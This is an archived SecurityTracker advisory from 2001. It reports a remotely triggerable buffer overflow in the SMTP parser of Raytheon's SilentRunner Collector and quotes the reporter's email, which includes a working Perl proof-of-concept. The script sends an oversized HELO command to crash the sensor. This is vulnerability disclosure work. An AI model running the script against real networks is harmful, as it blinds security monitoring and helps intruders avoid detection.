SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Security)  >   SilentRunner Vendors:   Raytheon
Raytheon's SilentRunner Networking Monitor Can Be Crashed Remotely
SecurityTracker Alert ID:  1001202
SecurityTracker URL:  http://securitytracker.com/id/1001202
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Mar 30 2001
Impact:   Denial of service via network
Exploit Included:  Yes  
Version(s): v1.6.1, possibly others
Description:   Raytheon's SilentRunner threat visualization tool reportedly contains a vulnerability that allows an attacker to crash the application by using a malformed SMTP e-mail command.

The SilentRunner Collector (SRC) component of SilentRunner has a buffer overflow condition in its parsing of sniffed SMTP traffic. The overflow occurs when the SRC is monitoring an SMTP session where an SMTP "HELO" command contains in excess of 4096 bytes.

Impact:   A remote user can send SMTP traffic across a monitored network segment to crash the SilentRunner Collector and stop the product from monitoring network traffic.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.silentrunner.com/ (Links to External Site)
Cause:   Boundary error

Message History:   None.


 Source Message Contents

Subject:  Silent Runner Collector - HELO buffer overflow vulnerability


Hello,

Silent Runner Collector (SRC) has a buffer overflow condition in the
routines
that parse SMTP traffic.  SRC is the "sniffer" conponent of the Silent
Runner
network traffic analysis suite.  The overflow was  noticed in SRC v1.6.1
but is
likely present in other versions as well.  The actual buffer in
question  holds the
SMTP HELO line.  The overflow occurs when a HELO command in excess of
4096 bytes transits a network segment that the collector is monitoring.
This
vulnerability can be exploited by an intruder to crash the collector and
thus stop
the monitoring of transiting network traffic.  I'm not sure if this bug
can be
exploited in such a way as to allow for the execution of code on the
sensor.
Maybe someone else has some insight into the possibilities for
arbitrary code
execution?

Jack



#!/usr/bin/perl
# This is a simple script that demonstrates the
# SRC HELO overflow vulnerability.  It will result
# in a crashed silent runner collector so please do
# not use it on production networks.  It is intended
# for demonstration purposes only.

use IO::Socket;

$remote_host = '192.168.111.3';
$remote_port = 25;

$buf = 'A' x 4092;

$socket = IO::Socket::INET->new(PeerAddr => $remote_host,

PeerPort => $remote_port,

Proto    => "tcp",

Type     => SOCK_STREAM)
or die "Can't connect to $remote_host:$remote_port : $@\n";

# 'HELO ' + $buf  = 4097 bytes ( 1 byte too much)
print $socket "HELO $buf";

exit;

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC